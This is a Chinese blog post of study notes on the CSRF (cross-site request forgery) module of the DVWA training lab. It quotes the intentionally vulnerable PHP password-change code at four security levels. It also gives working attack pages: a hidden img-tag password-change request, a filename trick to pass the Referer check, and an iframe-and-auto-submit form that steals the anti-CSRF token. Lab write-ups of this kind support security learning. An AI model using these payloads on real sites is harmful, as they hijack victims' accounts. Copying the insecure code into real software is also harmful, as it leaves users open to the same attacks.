DWVA-1.10学习笔记之三——CSRF(跨站请求伪造)

最新推荐文章于 2023-06-09 18:24:16 发布
最新推荐文章于 2023-06-09 18:24:16 发布
阅读量298 收藏 1
点赞数
分类专栏: 笔记 文章标签: 安全 cookie web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44045328/article/details/107451875
版权

讲在前面

CSRF(Cross-Site Request Forgery):跨站点请求伪造。
完全一次CSRF攻击需要具备以下条件:

  1. 受害者拥有未失效的身份认真信息(例如cookie等)
  2. 受害者点击了含有攻击代码的网站连接

具备这两个条件,攻击者就可以冒充受害者的身份想服务器发起请求,完成一些非法操作,例如修改密码等。

一、Low

1.1 服务器代码
<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

代码十分简单,就是在接收输入值之后,验证两次密码的输入是否相同,若相同则用md5散列之后直接写入数据库,完成密码修改。
这里有一点需要提一下,在一开始登录的时候,已经生成并保存了cookie信息,这里的代码没有体现cookie的生成。

1.2 漏洞利用

上面提到,实现这个攻击需要两个东西:有效的身份认证信息和恶意链接。身份认证在登录的时候生成了cookie,所以我们还需要构造恶意链接,这里的我们的恶意链接的目的是修改密码。
对于恶意链接的构造也有几个要求:
首先,不要让受害者一眼就看出是恶意链接以及链接的目的,例如以下链接

http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#

一眼就看得出点下去就会修改密码,稍微有点网络知识的人肯定不会点的。
对于这个问题,可以用短链接来隐藏真正的URL(但是对于IP域名的URL无法生成短链接)。但是,即使URL被隐藏,点下去之后也会跳转到修改密码成功页面,受害者马上就知道自己被攻击了。
在这里插入图片描述

为了不让受害者那么快就发现自己被攻击,我们还需要设计一个跳转网页。在实际操作中,这个跳转网页是需要放在公网的,否则受害者无法成功访问该网页,而且这个网页还需要专门设计,让受害者不会对跳转网页产生怀疑。这里我就只是简单做了一个网页而已,网页代码如下:

<img src="http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=hack&password_conf=hack&Change=Change#" border="0" style="display:none;"/>
<h1>hacked!<h1>

这里将恶意链接隐藏在img标签里面,只要用户点击进入这个页面,就会自动执行恶意链接。
在这里插入图片描述

二、Medium

2.1 服务器代码
<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Checks to see where the request came from
    if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
        // Get input
        $pass_new  = $_GET[ 'password_new' ];
        $pass_conf = $_GET[ 'password_conf' ];

        // Do the passwords match?
        if( $pass_new == $pass_conf ) {
            // They do!
            $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
            $pass_new = md5( $pass_new );

            // Update the database
            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // Feedback for the user
            echo "<pre>Password Changed.</pre>";
        }
        else {
            // Issue with passwords matching
            echo "<pre>Passwords did not match.</pre>";
        }
    }
    else {
        // Didn't come from a trusted source
        echo "<pre>That request didn't look correct.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

与Low级别相比,Medium多了个stripos()函数进行校验。即检查了HTTP_REFERER字段的值是否包含了SERVER_NAME字段的值,若不包含则会直接丢包。

  1. stripos()函数:查找字符串在另一字符串中第一次出现的位置(不区分大小写),若没有出现则返回false
  2. HTTP_Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。
  3. SERVER_NAME即主机名,一般情况下就是Host字段的值

也就是说,你存放钓鱼网页的网站域名(即Referer里面的域名)和真实的域名(即SERVER_NAME的值)需要一致,才可以验证通过(理论上)。

在这里插入图片描述
PS

一开始无论攻击机还是服务器都是搭建在同一个虚拟机,这样子的Host和Referer就会一样,相当于把钓鱼网页放在了真实的服务器里面,这样就失去了这个实验的意义,于是就多搭建了一个服务器作为靶机。然后钓鱼网页里面的链接也要相应的改成服务器的IP地址(懒得配置域名了)。而前面的东西我也懒得改了,后面的实验也是按两台虚拟机来做的。

2.2 漏洞利用

实际上,服务器只检查Referer的值,是否包含了SERVER_NAME的值而已,而Referer的值是可操控的,我们可以把网页的文件名改为真实服务器的域名,这样就可以符合服务器的检验。

在这里插入图片描述
使用bp抓包验证结果可以看到,修改了文件名就可以成功绕过验证规则。

三、High

3.1 服务器代码
<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

// Generate Anti-CSRF token
generateSessionToken();

?>

在Hight等级中,加入了token机制,每次访问修改密码界面的时候,服务器都会返回一个token值,之后的每个请求,都要带上token值给服务器验证,验证通过之后才会响应请求。

3.2 漏洞利用

绕过token机制,关键在于获取token值,所以钓鱼网页的设计思路是:
先用一个iframe请求获得token值,之后再发起改密请求。

<script type="text/javascript">
    function attack(){
    	document.getElementsByName('user_token')[0].value=document.getElementById("hack").contentWindow.document.getElementsByName('user_token')[0].value;
	    document.getElementById("transfer").submit(); 
    }
</script>

<iframe src="http://192.168.235.4/dvwa/vulnerabilities/csrf" id="hack" border="0" style="display:none;">
</iframe>

<body onload="attack()">
    <form method="GET" id="transfer" action="http://192.168.235.4/dvwa/vulnerabilities/csrf">
        <input type="hidden" name="password_new" value="password">
        <input type="hidden" name="password_conf" value="password">
        <input type="hidden" name="user_token" value="">
        <input type="hidden" name="Change" value="Change">
    </form>
</body>

不过这么做有一个很大的问题,就是现在的浏览器都不允许跨域请求,因此单纯用CSRF方法是无法获取token值的,一般需要配合XSS,这点等后面了解XSS的时候再进行尝试。

四、Impossible

4.1 服务器代码
<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $pass_curr = $_GET[ 'password_current' ];
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Sanitise current password input
    $pass_curr = stripslashes( $pass_curr );
    $pass_curr = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_curr ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass_curr = md5( $pass_curr );

    // Check that the current password is correct
    $data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
    $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
    $data->bindParam( ':password', $pass_curr, PDO::PARAM_STR );
    $data->execute();

    // Do both new passwords match and does the current password match the user?
    if( ( $pass_new == $pass_conf ) && ( $data->rowCount() == 1 ) ) {
        // It does!
        $pass_new = stripslashes( $pass_new );
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update database with new password
        $data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' );
        $data->bindParam( ':password', $pass_new, PDO::PARAM_STR );
        $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
        $data->execute();

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match or current password incorrect.</pre>";
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

Impossible等级在High的基础上,加入了对旧密码的验证,所以只要不知道旧密码就无法成功改密码。

五、最后说点废话

有一个很现实的问题就是,不少人是因为忘记了旧密码而需要改密码,因此Impossible等级所设置的防御机制在现实中并不人性化。现实中往往通过其他方式进行身份验证,例如短信验证码、邮件验证码等。

六、本人才疏学浅,若有错误或者其他问题,欢迎评论指出

咸鱼不翻翻翻身
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
DWVA靶场搭建
xxwithyou的博客
05-19 218
虚拟机环境:kali 2022使用容器:docker。
DVWA通关详细教程
来日可期的博客
08-13 7200
DVWA通关详细教程
DWVA靶场-爆破、命令执行、CSRF、文件上传、文件包含、不安全的验证码、SQL注入,七个模块低中高新手练习
m0_46412408的博客
10-06 783
目录模块一 Brute Force(爆破) Security level is currently: Low Security level is currently: mediumSecurity level is currently: highSecurity level is currently: impossible防御措施模块二 Command Injection(命令执行) Security level is currently: Low S
DVWA简介
热门推荐
live4dream的博客
10-26 4万+
DVWA是一个web安全学习靶场,集成了OWASP Top10的漏洞,用于web安全初学者练习web渗透技巧。
安全测试网站-DVWA下载安装启动
seanyang_的博客
06-09 1574
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞的web应用。它是一个基于PHP/MySQL开发的存在糟糕漏洞的web应用,旨在为专业的安全人员提供一个合法的环境,来测试他们的工具和技能。帮助web开发人员理解web应用保护的过程,还可以在课堂中为师生的安全性教学提供便利。
网络攻防以及DWVA-1.9的教程
08-02
文档资料有: 1.kali linux 可用靶机metasploitable2系统进行渗透测试,会用工具nessus、metasploit、nmap、burp...3.python基础、python黑客编程之道、PHP程序设计基础、PHP代码审计 是以word文档和ppt的形势,无视频
DWVA上传漏洞挖掘的测试例1共4页.pdf.zip
11-21
DWVA上传漏洞挖掘的测试例1共4页.pdf.zip
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
新手指南:DVWA 1.9 全级别教程
01-03
新手指南:DVWA 1.9 全级别教程
网络安全(渗透)DVWA靶场安装所需配置
07-10
这个是DVWA网络安全渗透靶场,这个是压缩包,此为靶场,不要看错了,学习网络安全或者是其他的渗透知识。靶场是必备的,一个好的靶场对学习知识起到了十分重要的作用,DVWA靶场是网络安全或者是渗透中必备的东西,...
DVWA之CSRF漏洞(详细)
qq_44720671的博客
07-26 1万+
CSRF简介 csrf全称为:Cross-site request forgery,是一种常见的web攻击。在场景中,攻击者会伪造一个请求(通常是一个链接),然后欺骗目标用户点击,用户一旦点击,攻击也就完成了。 与xss的区别:csrf是借助用户的权限完成攻击,攻击者并没有拿到权限;而xss是直接盗取用户权限去进行破坏。 更改难度: 点击dvwa security,选择难度,然后点击submit...
DVWA下载、安装、使用(漏洞测试环境搭建)教程
星如雨落
10-27 4万+
DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 一共有十个模块: 暴力(破解)、命令行注入、跨站请求伪造、文件包含、文件上传、不安全的验证码、SQL注入、SQL盲注、弱会话ID、XSS漏洞(DOM型跨站脚本、反射型跨站脚本、 存储型跨站脚本) 环境搭建 由于是本地搭建真实web漏洞网站,我就以Windows
dwva靶场 10-14
weixin_74286730的博客
02-14 158
xss
DVWA-CSRF全通关(图文详解+源码解析)
weixin_46709219的博客
03-13 1万+
一)名词解释: CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。在2013年发布的新版OWASP Top 10中,CSRF排名第8。 二)原理: 三)DVWA——
DVWA(全级别通关教程详解)
weixin_52385170的博客
10-08 2万+
DVWA 详解
DVWA下的CSRF攻防实战(详解)
一期一会的博客
04-20 4659
DVWA下的CSRF攻防实战(详解) 我们简单谈一谈CSRF与XSS的区别: CSRF (cross site request forgery)跨站请求伪造CSRF是用户在不知情的情况下提交请求,而XSS是用户自己点击链接来访问网页。 整个攻击过程: 用户浏览并登录受信任网站A(dvwa),登录成功以后网站A会返回浏览器的信息中带有已登录的cookiecookie信息会在浏览器端保存一定时间(根据浏览器设置而定),在用户没有退出网站A的情况下访问恶意站点B(这里在win2003制作一个危险网站),该危
新手指南:DVWA全级别教程之CSRF
g695144224的博客
08-09 2762
转自:http://www.freebuf.com/articles/web/118352.html DVWA简介DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。DVWA共有十个模块,分别是Brute
DVWA1.10_CSRF
whime
07-11 324
LOW 服务器收到提交的新密码和确认密码之后,比较是否相同,相同则修改密码,没有任何防护机制。此处可以简单构造带有参数的链接诱导用户点击: http://192.168.29.128/DVWA-master/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change# 但是点击之后会出现修改成功页面,用户很容易发现密码已经被修改了。 攻击者还可以诱导用户访问特定页面,将链接隐藏在标签中.
DVWA - CSRF (low, medium, high)
无节操
01-06 3391
low设置一下cookie的PHPSESSID和security即可跨站请求import requestsdef main(): url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php' headers = { 'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngk
dwva功能模块改进
最新发布
04-09
DWVA(Distributed Web Vulnerability Assessment)是一种分布式的Web漏洞评估工具,用于检测和评估Web应用程序中的安全漏洞。针对DWVA功能模块的改进,可以从以下几个方面进行优化: 1. 漏洞扫描引擎优化:改进...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值